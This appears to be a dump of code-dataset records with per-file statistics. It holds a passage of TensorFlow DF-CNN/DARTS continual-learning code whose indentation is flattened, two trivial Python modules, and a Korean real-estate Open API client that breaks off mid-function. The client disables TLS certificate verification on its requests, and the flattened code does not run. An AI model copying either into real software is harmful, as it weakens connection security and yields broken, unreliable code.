task_net, _, dfcnn_TS_params, conv_params, conv_select_params, fc_params = new_darts_dfcnn_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], self.dfcnn_KB_size, self.dfcnn_TS_size, self.dfcnn_stride_size, cnn_activation_fn=self.hidden_act, dfcnn_TS_activation_fn=None, fc_activation_fn=self.hidden_act, dfcnn_KB_params=params_KB, dfcnn_TS_params=params_TS, cnn_TS_params=params_conv, select_params=None, fc_params=params_fc, KB_reg_type=self.KB_l2_reg, TS_reg_type=self.TS_l2_reg, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, trainable=trainable, task_index=task_cnt)
self.conv_select_params = conv_select_params
## build network for evaluation
for conf in self._possible_configs:
net_tmp, _, _, _, _, _, _ = new_ELLA_flexible_cnn_deconv_tensordot_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], conf, self.dfcnn_KB_size, self.dfcnn_TS_size, self.dfcnn_stride_size, cnn_activation_fn=self.hidden_act, cnn_para_activation_fn=None, cnn_KB_params=params_KB, cnn_TS_params=dfcnn_TS_params, cnn_params=conv_params, fc_activation_fn=self.hidden_act, fc_params=fc_params, KB_reg_type=self.KB_l2_reg, TS_reg_type=self.TS_l2_reg, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, task_index=task_cnt, skip_connections=list(self.skip_connect), trainable=trainable)
eval_net.append(net_tmp[-1])
else:
## DF-CNN with the learned configuration
task_net, _, dfcnn_TS_params, _, conv_params, _, fc_params = new_ELLA_flexible_cnn_deconv_tensordot_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], self.conv_sharing[task_cnt], self.dfcnn_KB_size, self.dfcnn_TS_size, self.dfcnn_stride_size, cnn_activation_fn=self.hidden_act, cnn_para_activation_fn=None, cnn_KB_params=params_KB, cnn_TS_params=params_TS, cnn_params=params_conv, fc_activation_fn=self.hidden_act, fc_params=params_fc, KB_reg_type=self.KB_l2_reg, TS_reg_type=self.TS_l2_reg, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, task_index=task_cnt, skip_connections=list(self.skip_connect), trainable=trainable)
return task_net, eval_net, dfcnn_TS_params, conv_params, fc_params
def _build_whole_model(self):
for task_cnt, (num_classes, x_b) in enumerate(zip(self.output_sizes, self.x_batch)):
if (task_cnt==self.current_task) and (self.task_is_new):
param_to_reuse = {'KB': self.dfcnn_KB_params, 'TS': None, 'TS_Conv': None, 'FC': None}
else:
param_to_reuse = {'KB': self.dfcnn_KB_params, 'TS': self.np_params[task_cnt]['TS'], 'TS_Conv': self.np_params[task_cnt]['TS_Conv'], 'FC': self.np_params[task_cnt]['FC']}
task_net, eval_net, dfcnn_TS_params, conv_TS_params, fc_params = self._build_task_model(x_b, num_classes, task_cnt, params=param_to_reuse, trainable=(task_cnt==self.current_task))
self.task_models.append(task_net)
self.dfcnn_TS_params.append(dfcnn_TS_params)
self.conv_params.append(conv_TS_params)
self.fc_params.append(fc_params)
self.params.append(self._collect_trainable_variables())
self.num_trainable_var += count_trainable_var2(self.params[-1]) if task_cnt < 1 else count_trainable_var2(self.params[-1]) - self.dfcnn_KB_params_size
if len(eval_net) > 0:
self.darts_eval_models = eval_net
self.dfcnn_KB_trainable_param = get_list_of_valid_tensors(self.dfcnn_KB_params)
self.dfcnn_TS_trainable_param = get_list_of_valid_tensors(self.dfcnn_TS_params[self.current_task])
self.conv_trainable_param = get_list_of_valid_tensors(self.conv_params[self.current_task])
self.fc_trainable_param = get_list_of_valid_tensors(self.fc_params[self.current_task])
self.trainable_params = list(self.dfcnn_KB_trainable_param) + list(self.dfcnn_TS_trainable_param) + list(self.conv_trainable_param) + list(self.fc_trainable_param)
def add_new_task(self, output_dim, curr_task_index, single_input_placeholder=False):
self.conv_select_params, self.darts_eval_models = None, None
self._shared_param_init()
super().add_new_task(output_dim, curr_task_index, single_input_placeholder=single_input_placeholder)
def _shared_param_init(self):
self.dfcnn_TS_params = []
self.KB_l2_reg = tf.contrib.layers.l2_regularizer(scale=self.dfcnn_KB_reg_scale)
self.TS_l2_reg = tf.contrib.layers.l2_regularizer(scale=self.dfcnn_TS_reg_scale)
KB_init_val = self.np_params[0]['KB'] if hasattr(self, 'np_params') else [None for _ in range(self.num_conv_layers)]
self.dfcnn_KB_params = [new_ELLA_KB_param([1, self.dfcnn_KB_size[2*layer_cnt], self.dfcnn_KB_size[2*layer_cnt], self.dfcnn_KB_size[2*layer_cnt+1]], layer_cnt, 0, self.KB_l2_reg, KB_init_val[layer_cnt], True) for layer_cnt in range(self.num_conv_layers)]
self.dfcnn_KB_params_size = count_trainable_var2(self.dfcnn_KB_params)
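        # Note (annotation): each KB tensor has shape [1, k, k, c] with
        # k = dfcnn_KB_size[2*l] and c = dfcnn_KB_size[2*l+1]; the task-specific
        # deconv (TS) parameters expand these shared tensors into per-task conv
        # filters, which is the core DF-CNN idea.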
def get_darts_selection_val(self, sess):
return get_value_of_valid_tensors(sess, self.conv_select_params)
def get_params_val(self, sess, use_npparams=True):
selection_params_val = self.get_darts_selection_val(sess)
if use_npparams:
KB_val = self.np_params[0]['KB']
TS_val = [np_p['TS'] for np_p in self.np_params]
TS_conv_val = [np_p['TS_Conv'] for np_p in self.np_params]
fc_val = [np_p['FC'] for np_p in self.np_params]
else:
KB_val = get_value_of_valid_tensors(sess, self.dfcnn_KB_params)
TS_val = [get_value_of_valid_tensors(sess, dfcnn_TS_param) for dfcnn_TS_param in self.dfcnn_TS_params]
TS_conv_val = [get_value_of_valid_tensors(sess, cnn_TS_param) for cnn_TS_param in self.conv_params]
fc_val = [get_value_of_valid_tensors(sess, fc_param) for fc_param in self.fc_params]
parameters_val = {}
parameters_val['DARTS_selection_param'] = savemat_wrapper(selection_params_val)
parameters_val['KB'] = savemat_wrapper(KB_val)
parameters_val['TS'] = savemat_wrapper_nested_list(TS_val)
parameters_val['TS_conv'] = savemat_wrapper_nested_list(TS_conv_val)
parameters_val['fc_weights'] = savemat_wrapper_nested_list(fc_val)
return parameters_val
def best_config(self, sess):
        ## return the index of the sharing configuration in self._possible_configs implied by the DARTS selection parameters
selection_val = self.get_darts_selection_val(sess)
# argmax 0 -> task-specific / argmax 1 -> shared
selected_config_index = 0
for layer_cnt, (layer_select) in enumerate(selection_val):
selected_config_index = selected_config_index + np.argmax(layer_select) * (2**layer_cnt)
return selected_config_index
def darts_learned_selection(self, sess):
        ## return the per-layer sharing decisions (1: shared / 0: task-specific)
        ## derived from the DARTS selection parameters; these become the elements
        ## of self.conv_sharing (e.g. a 'bottom2' pattern is [1,1,0,0,0,..])
selection_val = self.get_darts_selection_val(sess)
sharing_flags = []
for layer_select in selection_val:
sharing_flags.append(np.argmax(layer_select))
return sharing_flags
def define_eval(self):
with tf.name_scope('Model_Eval'):
mask = tf.reshape(tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32), [self.batch_size, 1])
self.eval = [tf.nn.softmax(task_model[-1])*mask for task_model in self.task_models]
self.pred = [tf.argmax(task_model[-1]*mask, 1) for task_model in self.task_models]
if self.task_is_new:
self.eval_for_new_task = [tf.nn.softmax(task_model)*mask for task_model in self.darts_eval_models]
self.pred_for_new_task = [tf.argmax(task_model*mask, 1) for task_model in self.darts_eval_models]
def _loss_func(self, y1, y2):
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.cast(y1, tf.int32), logits=y2))
def define_loss(self):
with tf.name_scope('Model_Loss'):
self.loss = [self._loss_func(y_batch, task_model[-1]) for y_batch, task_model in zip(self.y_batch, self.task_models)]
def define_accuracy(self):
with tf.name_scope('Model_Accuracy'):
mask = tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32)
self.accuracy = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model[-1], 1), tf.cast(y_batch, tf.int64)), tf.float32)*mask) for y_batch, task_model in zip(self.y_batch, self.task_models)]
if self.task_is_new:
self.accuracy_for_new_task = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model, 1), tf.cast(self.y_batch[self.current_task], tf.int64)), tf.float32)*mask) for task_model in self.darts_eval_models]
def define_opt(self):
with tf.name_scope('Optimization'):
reg_var = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
KB_reg_term2 = tf.contrib.layers.apply_regularization(self.KB_l2_reg, reg_var)
TS_reg_term2 = tf.contrib.layers.apply_regularization(self.TS_l2_reg, reg_var)
KB_grads = tf.gradients(self.loss[self.current_task] + KB_reg_term2, self.dfcnn_KB_trainable_param)
KB_grads_vars = [(grad, param) for grad, param in zip(KB_grads, self.dfcnn_KB_trainable_param)]
TS_grads = tf.gradients(self.loss[self.current_task] + TS_reg_term2, self.dfcnn_TS_trainable_param)
TS_grads_vars = [(grad, param) for grad, param in zip(TS_grads, self.dfcnn_TS_trainable_param)]
conv_grads = tf.gradients(self.loss[self.current_task], self.conv_trainable_param)
conv_grads_vars = [(grad, param) for grad, param in zip(conv_grads, self.conv_trainable_param)]
fc_grads = tf.gradients(self.loss[self.current_task], self.fc_trainable_param)
fc_grads_vars = [(grad, param) for grad, param in zip(fc_grads, self.fc_trainable_param)]
self.grads = list(KB_grads) + list(TS_grads) + list(conv_grads) + list(fc_grads)
trainer = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.update = trainer.apply_gradients(KB_grads_vars + TS_grads_vars + conv_grads_vars + fc_grads_vars)
if self.task_is_new:
if self.approx_order == 1:
self.selection_grads = tf.gradients(self.loss[self.current_task], self.conv_select_params)
elif self.approx_order == 2:
raise NotImplementedError("Not Implemented because of 2nd derivative Issue!")
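                    # Presumably the deconv/tensordot KB-to-filter mapping used by
                    # DF-CNN does not expose a usable second derivative in this TF
                    # version, so only the first-order approximation is available.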
trainer2 = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.selection_update = trainer2.apply_gradients(list(zip(self.selection_grads, self.conv_select_params)))
def convert_tfVar_to_npVar(self, sess):
        if not (self.num_tasks == 1 and self.task_is_new):
            orig_KB = list(self.np_params[0]['KB']) ## copy of the shared KB before training the current task
        else:
            orig_KB = [None for _ in range(self.num_conv_layers)] ## one KB tensor per conv layer (see _shared_param_init)
def list_param_converter(list_of_params):
converted_params = []
for p in list_of_params:
if type(p) == np.ndarray:
converted_params.append(p)
elif _tf_tensor(p):
converted_params.append(sess.run(p))
else:
converted_params.append(p) ## append 'None' param
return converted_params
def double_list_param_converter(list_of_params):
converted_params = []
for task_params in list_of_params:
converted_params.append(list_param_converter(task_params))
return converted_params
def post_process(layers_to_share, original_KB, updated_KB, updated_TS, updated_conv):
for layer_cnt, (sharing_flag) in enumerate(layers_to_share):
if sharing_flag:
### Sharing this layer -> use new KB, TS, and make conv param None
updated_conv[self.current_task][2*layer_cnt], updated_conv[self.current_task][2*layer_cnt+1] = None, None
else:
### Not sharing this layer -> roll back KB, make TS None, and keep conv param (no action needed)
updated_KB[layer_cnt] = original_KB[layer_cnt]
updated_TS[self.current_task][4*layer_cnt], updated_TS[self.current_task][4*layer_cnt+1] = None, None
updated_TS[self.current_task][4*layer_cnt+2], updated_TS[self.current_task][4*layer_cnt+3] = None, None
return updated_KB, updated_TS, updated_conv
self.np_params = []
if len(self.conv_sharing) < self.num_tasks:
self.conv_sharing.append(self.darts_learned_selection(sess))
np_KB = list_param_converter(self.dfcnn_KB_params)
np_TS = double_list_param_converter(self.dfcnn_TS_params)
np_conv = double_list_param_converter(self.conv_params)
np_fc = double_list_param_converter(self.fc_params)
np_KB, np_TS, np_conv = post_process(self.conv_sharing[self.current_task], orig_KB, np_KB, np_TS, np_conv)
for t, c, f in zip(np_TS, np_conv, np_fc):
self.np_params.append({'KB': np_KB, 'TS': t, 'TS_Conv': c, 'FC': f} if len(self.np_params)< 1 else {'TS': t, 'TS_Conv': c, 'FC': f})
def _collect_trainable_variables(self):
return_list = []
for p in self.dfcnn_KB_params:
if p is not None:
return_list.append(p)
for p in self.dfcnn_TS_params[-1]:
if p is not None:
return_list.append(p)
for p in self.conv_params[-1]:
if p is not None:
return_list.append(p)
for p in self.fc_params[-1]:
if p is not None:
return_list.append(p)
return return_list
def train_one_epoch(self, sess, data_x, data_y, epoch_cnt, task_index, learning_indices=None, augment_data=False, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_train = data_x.shape[0]
if learning_indices is None:
learning_indices = list(range(num_train))
shuffle(learning_indices)
for batch_cnt in range(num_train//self.batch_size):
batch_train_x = data_x[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
batch_train_y = data_y[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
if self.task_is_new:
## Update architecture (selection param)
sess.run(self.selection_update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
## Update NN weights
sess.run(self.update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
def eval_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, num_classes = data_x.shape[0], self.output_sizes[task_model_index]
eval_output = np.zeros([num_data, num_classes], dtype=np.float32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
eval_func = self.eval_for_new_task[best_config]
else:
eval_func = self.eval[task_model_index]
for batch_cnt in range(num_batch):
eval_output[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = sess.run(eval_func, feed_dict={self.model_input: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
temp_pred = sess.run(eval_func, feed_dict={self.model_input: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
eval_output[-num_remains:] = temp_pred[0:num_remains]
return eval_output
def infer_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data = data_x.shape[0]
inferred_labels = np.zeros(num_data, dtype=np.int32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
pred_func = self.pred_for_new_task[best_config]
else:
pred_func = self.pred[task_model_index]
for batch_cnt in range(num_batch):
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
inferred_labels[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = np.squeeze(temp_pred)
if num_remains > 0:
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
inferred_labels[-num_remains:] = np.squeeze(temp_pred[0:num_remains])
return inferred_labels
def compute_accuracy_one_task(self, sess, data_x, data_y, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, accuracy = data_x.shape[0], 0.0
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
acc_func = self.accuracy_for_new_task[best_config]
else:
acc_func = self.accuracy[task_model_index]
for batch_cnt in range(num_batch):
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.true_output[task_model_index]: data_y[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
tmp_x, tmp_y = data_x_and_y_add_dummy(data_x[-num_remains:], data_y[-num_remains:], self.batch_size)
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: tmp_x, self.true_output[task_model_index]: tmp_y, self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
return float(accuracy)/float(num_data) | 68.414925 | 797 | 0.703347 | 6,897 | 45,838 | 4.284327 | 0.045672 | 0.024975 | 0.028157 | 0.012657 | 0.932282 | 0.903042 | 0.881282 | 0.866831 | 0.838506 | 0.819114 | 0 | 0.007554 | 0.19137 | 45,838 | 670 | 798 | 68.414925 | 0.789646 | 0.05478 | 0 | 0.752852 | 0 | 0 | 0.021717 | 0.001511 | 0 | 0 | 0 | 0 | 0.007605 | 1 | 0.091255 | false | 0 | 0.015209 | 0.007605 | 0.163498 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
037ad973fbb6b149c3f1193e80451769ed489602 | 102 | py | Python | hfb/runner/factory.py | harshanarayana/hfb | c42a6d7da29ada5053e259195a4676835a6afa86 | [
"MIT"
] | 1 | 2019-02-09T18:42:39.000Z | 2019-02-09T18:42:39.000Z | hfb/runner/factory.py | harshanarayana/hfb | c42a6d7da29ada5053e259195a4676835a6afa86 | [
"MIT"
] | null | null | null | hfb/runner/factory.py | harshanarayana/hfb | c42a6d7da29ada5053e259195a4676835a6afa86 | [
"MIT"
] | null | null | null | from hfb.runner.framework import *
from hfb.runner.server import *
from hfb.runner.component import *
| 25.5 | 34 | 0.794118 | 15 | 102 | 5.4 | 0.466667 | 0.259259 | 0.481481 | 0.469136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 102 | 3 | 35 | 34 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
063f62470e9f4bb3ba3d11e3e1bdfca2242d0e7e | 128 | py | Python | python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_0/_pkg1_0_1/_pkg1_0_1_0/_pkg1_0_1_0_1/_mod1_0_1_0_1_2.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_0/_pkg1_0_1/_pkg1_0_1_0/_pkg1_0_1_0_1/_mod1_0_1_0_1_2.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_0/_pkg1_0_1/_pkg1_0_1_0/_pkg1_0_1_0_1/_mod1_0_1_0_1_2.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | name1_0_1_0_1_2_0 = None
name1_0_1_0_1_2_1 = None
name1_0_1_0_1_2_2 = None
name1_0_1_0_1_2_3 = None
name1_0_1_0_1_2_4 = None | 14.222222 | 24 | 0.820313 | 40 | 128 | 1.875 | 0.175 | 0.266667 | 0.466667 | 0.533333 | 0.88 | 0.88 | 0.746667 | 0 | 0 | 0 | 0 | 0.318182 | 0.140625 | 128 | 9 | 25 | 14.222222 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
069095baed887bfdcd67bf53d43878a62de39721 | 41,488 | py | Python | PublicDataReader/PublicDataPortal/molit.py | jswoo/PublicDataReader | a90428982c4a4de0bc1bff279fcf0d2009f4d090 | [
"MIT"
] | 2 | 2022-02-07T07:01:42.000Z | 2022-02-07T07:05:50.000Z | PublicDataReader/PublicDataPortal/molit.py | jswoo/PublicDataReader | a90428982c4a4de0bc1bff279fcf0d2009f4d090 | [
"MIT"
] | null | null | null | PublicDataReader/PublicDataPortal/molit.py | jswoo/PublicDataReader | a90428982c4a4de0bc1bff279fcf0d2009f4d090 | [
"MIT"
] | null | null | null | '''
Ministry of Land, Infrastructure and Transport Open API
molit (Ministry of Land, Infrastructure and Transport)
1. Transaction class: real estate transaction price lookups
    - AptTrade: apartment sale transaction records
    - AptTradeDetail: apartment sale transaction records (detailed)
    - AptRent: apartment jeonse / monthly-rent records
    - AptOwnership: apartment pre-sale ownership (resale) report records
    - OffiTrade: officetel sale report records
    - OffiRent: officetel jeonse / monthly-rent report records
    - RHTrade: row-house / multi-family sale transaction records
    - RHRent: row-house / multi-family jeonse / monthly-rent records
    - DHTrade: detached / multi-household sale transaction records
    - DHRent: detached / multi-household jeonse / monthly-rent records
    - LandTrade: land sale report records
    - BizTrade: commercial-use real estate sale report records
'''
import pandas as pd
import numpy as np
import datetime
import requests
from bs4 import BeautifulSoup
class Transaction:
def __init__(self, serviceKey):
'''
        Initialize with the service key issued by the Korean Public Data Portal.
'''
        # Initialize the Open API service key
self.serviceKey = serviceKey
        # Per-service base URLs (also used below to validate the service key)
self.urlAptTrade = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcAptTrade?serviceKey=" + self.serviceKey
self.urlAptTradeDetail = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcAptTradeDev?serviceKey=" + self.serviceKey
self.urlAptRent = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcAptRent?serviceKey=" + self.serviceKey
self.urlAptOwnership = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcSilvTrade?serviceKey=" + self.serviceKey
self.urlOffiTrade = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcOffiTrade?serviceKey=" + self.serviceKey
self.urlOffiRent = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcOffiRent?serviceKey=" + self.serviceKey
self.urlRHTrade = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcRHTrade?serviceKey=" + self.serviceKey
self.urlRHRent = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcRHRent?serviceKey=" + self.serviceKey
self.urlDHTrade = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcSHTrade?serviceKey=" + self.serviceKey
self.urlDHRent = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcSHRent?serviceKey=" + self.serviceKey
self.urlLandTrade = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcLandTrade?serviceKey=" + self.serviceKey
self.urlBizTrade = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcNrgTrade?serviceKey=" + self.serviceKey
# Open API URL Dict
urlDict = {
'아파트매매 실거래자료 조회': self.urlAptTrade,
'아파트매매 실거래 상세 자료 조회': self.urlAptTradeDetail,
'아파트 전월세 자료 조회': self.urlAptRent,
'아파트 분양권전매 신고 자료 조회': self.urlAptOwnership,
'오피스텔 매매 신고 조회': self.urlOffiTrade,
'오피스텔 전월세 신고 조회': self.urlOffiRent,
'연립다세대 매매 실거래자료 조회': self.urlRHTrade,
'연립다세대 전월세 실거래자료 조회': self.urlRHRent,
'단독/다가구 매매 실거래 조회': self.urlDHTrade,
'단독/다가구 전월세 자료 조회': self.urlDHRent,
'토지 매매 신고 조회': self.urlLandTrade,
'상업업무용 부동산 매매 신고 자료 조회': self.urlBizTrade
}
        # Check that each service responds normally
for serviceName, url in urlDict.items():
result = requests.get(url, verify=False)
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
te = xmlsoup.findAll('header')
            if te[0].find('resultCode').text == '00':
                print(f'>>> {serviceName} service is operating normally.')
            else:
                print(f'>>> {serviceName} service key is not registered (error).')
        # Initialize region codes
        # Legal-dong code source: https://code.go.kr
path_code = "https://raw.githubusercontent.com/WooilJeong/PublicDataReader/f14e4de3410cc0f798a83ee5934070d651cbd67b/docs/%EB%B2%95%EC%A0%95%EB%8F%99%EC%BD%94%EB%93%9C%20%EC%A0%84%EC%B2%B4%EC%9E%90%EB%A3%8C.txt"
code = pd.read_csv(path_code, encoding='cp949', sep='\t')
code = code.loc[code['폐지여부']=='존재']
code['법정구코드'] = list(map(lambda a: str(a)[:5], list(code['법정동코드'])))
self.code = code
def CodeFinder(self, name):
'''
        The molit transaction-price Open API uses a 5-digit district (gu) code,
        i.e. the first 5 digits of the 10-digit legal-dong code. This method
        takes a district name string and returns the matching codes as a
        pandas DataFrame.
'''
result = self.code[self.code['법정동명'].str.contains(name)][['법정동명','법정구코드']]
result.index = range(len(result))
return result
def DataCollector(self, service, LAWD_CD, start_date, end_date):
'''
        Query a given service over a range of months.
        Input: per-service query method, region code, start month (YYYYmm), end month (YYYYmm)
'''
start_date = datetime.datetime.strptime(str(start_date),'%Y%m')
start_date = datetime.datetime.strftime(start_date, '%Y-%m')
end_date = datetime.datetime.strptime(str(end_date), '%Y%m')
end_date = end_date + datetime.timedelta(days=31)
end_date = datetime.datetime.strftime(end_date, '%Y-%m')
ts = pd.date_range(start=start_date, end=end_date, freq='m')
date_list = list(ts.strftime('%Y%m'))
df = pd.DataFrame()
df_sum = pd.DataFrame()
for m in date_list:
print('>>> LAWD_CD :', LAWD_CD, 'DEAL_YMD :', m)
DEAL_YMD = m
df = service(LAWD_CD, DEAL_YMD)
df_sum = pd.concat([df_sum, df])
df_sum.index = range(len(df_sum))
return df_sum
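    # Usage sketch (illustrative only; assumes a valid service key from the
    # Public Data Portal, and uses 11680 purely as an example district code):
    #   ts = Transaction(serviceKey="...")
    #   ts.CodeFinder("강남구")  # look up 5-digit district codes by name
    #   df = ts.DataCollector(ts.AptTrade, 11680, 201901, 201903)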
def AptTrade(self, LAWD_CD, DEAL_YMD):
'''
        01 Apartment sale transaction records
        Input: region code (first 5 digits of the legal-dong code), contract month (YYYYmm)
'''
# URL
url_1 = self.urlAptTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','아파트','지번','년','월','일','건축년도','전용면적','층','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,아파트,지번,년,월,일,건축년도,전용면적,층,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','아파트','지번','전용면적','층','건축년도','거래금액']
# Feature Engineering
            if len(df) > 0:
                df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
                df['거래일'] = pd.to_datetime(df['거래일'])
                df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',', ''))
            else:
                df = pd.DataFrame(columns=colNames)
                print("No records found for this query.")
            # Arrange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df['아파트'] = df['아파트'].str.strip()
df.index = range(len(df))
            # Type conversion
cols = df.columns.drop(['법정동','거래일','아파트','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
            # resultCode "00" means the request itself succeeded, so reaching
            # this branch indicates an error in the Python logic above
            if te[0].find('resultCode').text == "00":
                print(">>> Python Logic Error. e-mail : wooil@kakao.com")
            # Otherwise the Open API provider returned an error
            else:
